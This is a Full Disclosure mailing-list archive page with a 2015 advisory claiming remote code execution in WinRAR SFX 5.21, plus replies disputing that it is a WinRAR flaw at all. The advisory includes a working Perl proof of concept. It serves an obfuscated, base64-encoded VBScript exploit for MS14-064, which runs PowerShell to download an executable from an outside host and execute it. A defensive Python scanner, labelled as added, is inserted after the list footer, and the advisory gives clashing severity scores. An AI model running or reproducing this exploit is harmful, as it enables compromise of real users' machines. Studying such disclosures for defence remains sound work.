Full Disclosure mailing list archives
Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability
From: Hernan Moller <hernan () nivel4 com>
Date: Sun, 4 Oct 2015 19:32:05 -0300
In fact, an SFX file can only try to access a specific URL (the attacker's server). Then the attacker exploits a Microsoft vulnerability (MS14-064). The WinRAR file doesn't allow RCE by itself.

--
Hernán Möller
http://nivel4.com

2015-09-28 5:39 GMT-03:00 Gynvael Coldwind <gynvael () coldwind pl>:
Correct me if I'm wrong, but the vulnerability can be summarized as: if you run an untrusted .exe you might execute malicious code? I hardly see this as giving anything new to the attacker who can just create a malicious exe file, set the winrar sfx icon and send it to the victim.

Keep in mind that not every unexpected behavior or software bug is a security vulnerability. (and no, potential AV bypass doesn't make it a vulnerability either)

Cheers,
Gynvael

On Mon, 28 Sep 2015 10:27 Vulnerability Lab <research () vulnerability-lab com> wrote:

Document Title:
===============
WinRAR SFX v5.21 - Remote Code Execution Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1608

Video: https://www.youtube.com/watch?v=fo0l0oT4468

Release Date:
=============
2015-09-28

Vulnerability Laboratory ID (VL-ID):
====================================
1608

Common Vulnerability Scoring System:
====================================
9

Product & Service Introduction:
===============================
WinRAR, with over 500 million users worldwide, is by far the most popular compression program and therefore the best way to pack files securely and efficiently for a data transfer, to speed up data transfer via e-mail and for secure storage of optimized files.

(Copy of the Homepage: http://www.win-rar.com/start.html )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a code execution vulnerability in the official WinRAR SFX v5.21 software.

Vulnerability Disclosure Timeline:
==================================
2015-09-28: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Critical

Technical Details & Description:
================================
A remote code execution vulnerability has been discovered in the official WinRAR SFX v5.21 software.
The vulnerability allows remote attackers to execute unauthorized system-specific code to compromise a target system. The issue is located in the `Text and Icon` function of the `Text to display in SFX window` module. Remote attackers are able to generate their own compressed archives with malicious payloads to execute system-specific code for compromise. The attackers save the maliciously generated HTML code in the SFX archive input. This results in a system-specific code execution when a target user or system is processing to open the compressed archive.

The security risk of the code execution vulnerability is estimated as critical with a CVSS (Common Vulnerability Scoring System) count of 9.2. Exploitation of the code execution vulnerability requires low user interaction (open file) without a privileged system or restricted user account. Successful exploitation of the remote code execution vulnerability in the WinRAR SFX software results in system, network or device compromise.

Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by remote attackers without a privileged system user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...

1. Run perl code: perl poc.pl
2. Right click on any file and select "Add to archive..."
3. Select "Create SFX archive"
4. Go to the Advanced menu and select "SFX options..."
5. Go to the "Text and icon" menu
6. Copy this perl output (HTML) and paste it in "Text to display in SFX window"
7. Click OK -- OK
8. Your SFX file is created
9. Just open the SFX file
10. Your link downloads/executes on your target
11. Successful reproduction of the code execution vulnerability!
PoC: Exploit Code

#!/usr/bin/perl
# Title : WinRaR SFX - Remote Code Execution
# Affected Versions: All Version
# Tested on Windows 7 / Server 2008
#
# Author: Mohammad Reza Espargham
# Linkedin: https://ir.linkedin.com/in/rezasp
# E-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website: www.reza.es
# Twitter: https://twitter.com/rezesp
# FaceBook: https://www.facebook.com/reza.espargham
#
# ID: MS14-064

use strict;
use warnings;
use IO::Socket;
use MIME::Base64 qw( decode_base64 );
use Socket 'inet_ntoa';
use Sys::Hostname 'hostname';

print " Mohammad Reza Espargham\n\n";

# Local address that is placed in the META refresh URL printed below
my $ip = inet_ntoa(scalar gethostbyname(hostname() || 'localhost'));
my $port = 80;

# HTML to paste into "Text to display in SFX window": a META refresh pointing at this host
print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . '"></head></html>'."\n\n" if($port==80);
print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . ':' . $port . '"></head></html>'."\n\n" if($port!=80);

my $server = new IO::Socket::INET(
    Proto     => 'tcp',
    LocalPort => $port,
    Listen    => SOMAXCONN,
    ReuseAddr => 1) or die "Unable to create server socket";

# Server loop: read the request headers up to the blank line, then answer
while(my $client = $server->accept()) {
    my $client_info;
    while(<$client>) {
        last if /^\r\n$/;
        $client_info .= $_;
    }
    incoming($client, $client_info);
}

sub incoming {
    print "\n=== Incoming Request:\n";
    my $client = shift;
    print $client &buildResponse($client, shift);
    close($client);
}

# Builds the HTTP response whose body is the base64-encoded page below
sub buildResponse {
    my $client = shift;
    my $client_info = shift;
my$poc="CjxodG1sPgo8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVtdWxhdGVJRTgiID4KPGhlYWQ+CjwvaGVhZD4KPGJvZHk+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPgoKZnVuY3Rpb24gcnVubXVtYWEoKSAKT24gRXJyb3IgUmVzdW1lIE5leHQKc2V0IHNoZWxsPWNyZWF0ZW9iamVjdCgiU2hlbGwuQXBwbGljYXRpb24iKQpjb21tYW5kPSJJbnZva2UtRXhwcmVzc2lvbiAkKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cDovL3RoZS5lYXJ0aC5saS9+c2d0YXRoYW0vcHV0dHkvbGF0ZXN0L3g4Ni9wdXR0eS5leGUnLCdsb2FkLmV4ZScpOyQoTmV3LU9iamVjdCAtY29tIFNoZWxsLkFwcGxpY2F0aW9uKS5TaGVsbEV4ZWN1dGUoJ2xvYWQuZXhlJyk7IgpzaGVsbC5TaGVsbEV4ZWN1dGUgInBvd2Vyc2hlbGwuZXhlIiwgIi1Db21tYW5kICIgJiBjb21tYW5kLCAiIiwgInJ1bmFzIiwgMAplbmQgZnVuY3Rpb24KPC9zY3JpcHQ+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPgogIApkaW0gICBhYSgpCmRpbSAgIGFiKCkKZGltICAgYTAKZGltICAgYTEKZGltICAgYTIKZGltICAgYTMKZGltICAgd2luOXgKZGltICAgaW50VmVyc2lvbgpkaW0gICBybmRhCmRpbSAgIGZ1bmNsYXNzCmRpbSAgIG15YXJyYXkKIApCZWdpbigpCiAKZnVuY3Rpb24gQmVnaW4oKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgaW5mbz1OYXZpZ2F0b3IuVXNlckFnZW50CiAKICBpZihpbnN0cihpbmZvLCJXaW42NCIpPjApICAgdGhlbgogICAgIGV4aXQgICBmdW5jdGlvbgogIGVuZCBpZgogCiAgaWYgKGluc3RyKGluZm8sIk1TSUUiKT4wKSAgIHRoZW4gCiAgICAgICAgICAgICBpbnRWZXJzaW9uID0gQ0ludChNaWQoaW5mbywgSW5TdHIoaW5mbywgIk1TSUUiKSArIDUsIDIpKSAgIAogIGVsc2UKICAgICBleGl0ICAgZnVuY3Rpb24gIAogICAgICAgICAgICAgIAogIGVuZCBpZgogCiAgd2luOXg9MAogCiAgQmVnaW5Jbml0KCkKICBJZiBDcmVhdGUoKT1UcnVlIFRoZW4KICAgICBteWFycmF5PSAgICAgICAgY2hydygwMSkmY2hydygyMTc2KSZjaHJ3KDAxKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKQogICAgIG15YXJyYXk9bXlhcnJheSZjaHJ3KDAwKSZjaHJ3KDMyNzY3KSZjaHJ3KDAwKSZjaHJ3KDApCiAKICAgICBpZihpbnRWZXJzaW9uPDQpIHRoZW4KICAgICAgICAgZG9jdW1lbnQud3JpdGUoIjxicj4gSUUiKQogICAgICAgICBkb2N1bWVudC53cml0ZShpbnRWZXJzaW9uKQogICAgICAgICBydW5zaGVsbGNvZGUoKSAgICAgICAgICAgICAgICAgICAgCiAgICAgZWxzZSAgCiAgICAgICAgICBzZXRub3RzYWZlbW9kZSgpCiAgICAgZW5kIGlmCiAgZW5kIGlmCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIEJlZ2luSW5pdCgpCiAgIFJhbmRvbWl6ZSgpCiAgIHJlZGltIGFhKDUpCiAgIHJlZGltIGFiKDUpCiAgIGEwPTEzKzE3KnJu
ZCg2KQogICBhMz03KzMqcm5kKDUpCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIENyZWF0ZSgpCiAgT24gRXJyb3IgUmVzdW1lIE5leHQKICBkaW0gaQogIENyZWF0ZT1GYWxzZQogIEZvciBpID0gMCBUbyA0MDAKICAgIElmIE92ZXIoKT1UcnVlIFRoZW4KICAgICAgIENyZWF0ZT1UcnVlCiAgICAgICBFeGl0IEZvcgogICAgRW5kIElmIAogIE5leHQKZW5kIGZ1bmN0aW9uCiAKc3ViIHRlc3RhYSgpCmVuZCBzdWIKIApmdW5jdGlvbiBteWRhdGEoKQogICAgT24gRXJyb3IgUmVzdW1lIE5leHQKICAgICBpPXRlc3RhYQogICAgIGk9bnVsbAogICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMikgIAogICAKICAgICBhYigwKT0wCiAgICAgYWEoYTEpPWkKICAgICBhYigwKT02LjM2NTk4NzM3NDM3ODAxRS0zMTQKIAogICAgIGFhKGExKzIpPW15YXJyYXkKICAgICBhYigyKT0xLjc0MDg4NTM0NzMxMzI0RS0zMTAgIAogICAgIG15ZGF0YT1hYShhMSkKICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApICAKZW5kIGZ1bmN0aW9uIAogCiAKZnVuY3Rpb24gc2V0bm90c2FmZW1vZGUoKQogICAgT24gRXJyb3IgUmVzdW1lIE5leHQKICAgIGk9bXlkYXRhKCkgIAogICAgaT1ydW0oaSs4KQogICAgaT1ydW0oaSsxNikKICAgIGo9cnVtKGkrJmgxMzQpICAKICAgIGZvciBrPTAgdG8gJmg2MCBzdGVwIDQKICAgICAgICBqPXJ1bShpKyZoMTIwK2spCiAgICAgICAgaWYoaj0xNCkgdGhlbgogICAgICAgICAgICAgIGo9MCAgICAgICAgICAKICAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpICAgICAgICAgICAgIAogICAgIGFhKGExKzIpKGkrJmgxMWMrayk9YWIoNCkKICAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApICAKIAogICAgIGo9MCAKICAgICAgICAgICAgICBqPXJ1bShpKyZoMTIwK2spICAgCiAgICAgICAgICAKICAgICAgICAgICAgICAgRXhpdCBmb3IKICAgICAgICAgICBlbmQgaWYKIAogICAgbmV4dCAKICAgIGFiKDIpPTEuNjk3NTk2NjMzMTY3NDdFLTMxMwogICAgcnVubXVtYWEoKSAKZW5kIGZ1bmN0aW9uCiAKZnVuY3Rpb24gT3ZlcigpCiAgICBPbiBFcnJvciBSZXN1bWUgTmV4dAogICAgZGltIHR5cGUxLHR5cGUyLHR5cGUzCiAgICBPdmVyPUZhbHNlCiAgICBhMD1hMCthMwogICAgYTE9YTArMgogICAgYTI9YTArJmg4MDAwMDAwCiAgIAogICAgcmVkaW0gIFByZXNlcnZlIGFhKGEwKSAKICAgIHJlZGltICAgYWIoYTApICAgICAKICAgCiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpCiAgIAogICAgdHlwZTE9MQogICAgYWIoMCk9MS4xMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAKICAgIGFhKGEwKT0xMAogICAgICAgICAgIAogICAgSWYoSXNPYmplY3QoYWEoYTEtMSkpID0gRmFsc2UpIFRoZW4KICAgICAgIGlmKGludFZlcnNpb248NCkgdGhlbgogICAgICAgICAgIG1lbT1jaW50KGEwKzEpKjE2ICAgICAgICAgICAgIAogICAgICAgICAgIGo9dmFydHlwZShhYShhMS0xKSkKICAgICAgICAgICBpZigoaj1t
ZW0rNCkgb3IgKGoqOD1tZW0rOCkpIHRoZW4KICAgICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAgICAgICAgICAgICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbiAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUoYWEoYTEpKQogICAgICAgICAgICAgICAgIGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICAgIGVuZCBpZgogICAgICAgICAgIGVsc2UKICAgICAgICAgICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKICAgICAgICAgICAgIGV4aXQgIGZ1bmN0aW9uCiAKICAgICAgICAgICBlbmQgaWYgCiAgICAgICAgZWxzZQogICAgICAgICAgIGlmKHZhcnR5cGUoYWEoYTEtMSkpPD4wKSAgVGhlbiAgICAKICAgICAgICAgICAgICBJZihJc09iamVjdChhYShhMSkpID0gRmFsc2UgKSBUaGVuCiAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUoYWEoYTEpKQogICAgICAgICAgICAgIGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICBlbmQgaWYKICAgICAgICBlbmQgaWYKICAgIGVuZCBpZgogICAgICAgICAgICAgICAKICAgICAKICAgIElmKHR5cGUxPSZoMmY2NikgVGhlbiAgICAgICAgIAogICAgICAgICAgT3Zlcj1UcnVlICAgICAgCiAgICBFbmQgSWYgIAogICAgSWYodHlwZTE9JmhCOUFEKSBUaGVuCiAgICAgICAgICBPdmVyPVRydWUKICAgICAgICAgIHdpbjl4PTEKICAgIEVuZCBJZiAgCiAKICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkgICAgICAgICAgCiAgICAgICAgIAplbmQgZnVuY3Rpb24KIApmdW5jdGlvbiBydW0oYWRkKSAKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpICAKICAgCiAgICBhYigwKT0wICAgCiAgICBhYShhMSk9YWRkKzQgICAgIAogICAgYWIoMCk9MS42OTc1OTY2MzMxNjc0N0UtMzEzICAgICAgIAogICAgcnVtPWxlbmIoYWEoYTEpKSAgCiAgICAKICAgIGFiKDApPTAKICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKZW5kIGZ1bmN0aW9uCiAKPC9zY3JpcHQ+CiAKPC9ib2R5Pgo8L2h0bWw+";
    $poc = decode_base64($poc);
    my $r = "HTTP/1.0 200 OK\r\nContent-type: text/html\r\n\r\n $poc";
    return $r;
}

Security Risk:
==============
The security risk of the code execution vulnerability in the winrar sfx software is estimated as high. (CVSS 7.4)

Credits & Authors:
==================
Mohammad Reza Espargham [https://ir.linkedin.com/in/rezasp] (me () reza es or reza.espargham () gmail com] (www.reza.es)

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty.
Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin () vulnerability-lab com - research () vulnerability-lab com - admin () evolution-sec com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partial usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin () vulnerability-lab com or research () vulnerability-lab com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com
PGP KEY: http://www.vulnerability-lab.com/keys/admin () vulnerability-lab com%280x198E9928%29.txt

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
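For triage of the behaviour the thread discusses (HTML in the SFX text pane that only redirects the embedded browser to an attacker-controlled URL), the following scan flags a META refresh or active-content tag inside an SFX executable while leaving ordinary formatting HTML alone. This is an added example, not code from any message in the thread; it assumes the SFX text is stored as plain bytes in the executable and uses constructed sample bytes, with 192.0.2.10 as a placeholder address.

```python
import re

# Constructed sample bytes standing in for a suspicious SFX executable (not a real file):
# filler around the exact HTML shape the PoC prints for "Text to display in SFX window".
# 192.0.2.10 is a documentation address used as a placeholder, not a real server.
SUSPICIOUS_SFX = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b'<html><head><title>poc</title>'
    + b'<META http-equiv="refresh" content="0;URL=http://192.0.2.10:8080"></head></html>'
    + b"\x00" * 8
)
# Benign SFX text: plain HTML formatting is a supported feature, so it must not be flagged.
BENIGN_SFX = b"MZ\x90\x00" + b"<html><body><b>Setup</b> will extract files.</body></html>"

# META refresh with a URL target (the navigation the SFX text pane would perform).
META_REFRESH = re.compile(
    rb'<meta\b[^>]*http-equiv\s*=\s*["\']?refresh["\']?[^>]*'
    rb'content\s*=\s*["\']?\s*\d*\s*;\s*url\s*=\s*([^"\'>\s]+)',
    re.IGNORECASE,
)
# Script or embedded-object tags have no place in an installer's text pane.
ACTIVE_TAG = re.compile(rb'<(script|iframe|object|embed)\b', re.IGNORECASE)


def triage_sfx_text(blob: bytes) -> dict:
    """Report HTML in raw SFX bytes that would navigate away or run active content."""
    urls = [m.group(1).decode("latin-1") for m in META_REFRESH.finditer(blob)]
    # Only off-host targets matter: a refresh to an external URL is the redirect step.
    remote = [u for u in urls if u.lower().startswith(("http://", "https://", "//"))]
    active = sorted({t.decode("ascii").lower() for t in ACTIVE_TAG.findall(blob)})
    return {
        "refresh_urls": urls,
        "remote_refresh": remote,
        "active_tags": active,
        "suspicious": bool(remote) or bool(active),
    }


if __name__ == "__main__":
    for name, blob in (("suspicious", SUSPICIOUS_SFX), ("benign", BENIGN_SFX)):
        print(name, triage_sfx_text(blob))
```

A hit only says the text pane would navigate or run script; whether that leads to code execution depends on the browser engine bug reached, as the reply above notes.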
Current thread:
- Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability Gynvael Coldwind (Oct 01)
- Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability Hernan Moller (Oct 05)
- Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability Stefan Kanthak (Oct 05)
- Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability Shawn McMahon (Oct 08)
- Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability Stefan Kanthak (Oct 10)
- Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability Fernando Mercês (Oct 19)
- Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability Shawn McMahon (Oct 08)